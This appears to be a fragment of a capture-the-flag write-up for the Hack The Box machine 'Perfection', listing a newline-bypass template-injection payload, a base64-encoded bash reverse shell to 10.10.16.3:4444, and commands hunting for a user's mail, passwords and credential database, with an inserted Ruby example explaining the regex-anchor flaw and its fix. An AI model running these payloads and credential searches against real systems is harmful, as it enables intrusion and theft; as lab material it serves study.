HTB: Perfection
Jorge Moreno / June 23, 2024
A new line is enough to bypass the control
%0A<%25=system("ping+-c1+10.10.16.3")%25>
echo "bash -i >& /dev/tcp/10.10.16.3/4444 0>&1" | base64 | sed 's/\+/\%2b/'
echo "YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNi4zLzQ0NDQgMD4mMQo=" | base64 -d |bash
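Why a newline gets past this kind of check, as an added example that is not code from the original post or from the target application. It assumes the control is an allow-list regex anchored with `^` and `$`; the pattern, function names and sample input are constructed for illustration.

```ruby
require "erb"

# Assumption: the filter is an allow-list regex of this shape (constructed).
# In Ruby, ^ and $ match at every line boundary, so one clean line
# anywhere in the input is enough for the whole input to pass.
WEAK_ALLOWLIST = /^[a-zA-Z0-9\/ ]+$/

# \A and \z anchor to the start and end of the whole string.
# \z (not \Z) also rejects a trailing newline.
STRICT_ALLOWLIST = /\A[a-zA-Z0-9\/ ]+\z/

def weak_valid?(input)
  WEAK_ALLOWLIST.match?(input)
end

def strict_valid?(input)
  STRICT_ALLOWLIST.match?(input)
end

# Returns the value only when the whole string passes the strict check.
def safe_category(input)
  input.is_a?(String) && strict_valid?(input) ? input : nil
end

# Second layer: the template source is fixed and the user value is passed
# in as data, so template markers in the value are never evaluated.
TEMPLATE = ERB.new("Category: <%= ERB::Util.html_escape(category) %>")

def render(category)
  TEMPLATE.result_with_hash(category: category)
end

# Constructed input: a clean first line, a newline (%0A once URL-decoded),
# then template markup with a harmless arithmetic expression.
SAMPLE = "Maths\n<%= 7 * 7 %>"

if __FILE__ == $PROGRAM_NAME
  puts "weak check accepts sample:   #{weak_valid?(SAMPLE)}"
  puts "strict check accepts sample: #{strict_valid?(SAMPLE)}"
  puts render("<%= 7 * 7 %>")
end
```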
# Files owned by the user
find / -uid 1001 -type f -ls 2>/dev/null | grep -v "/proc/"
# Files with the name of the user in it
find / -name "*susan*" -type f -ls 2>/dev/null
cat /var/mail/susan
# Files with the word password in the home directory
grep -i password -R .
strings Migration/pupilpath_credentials.db | grep -i "susan"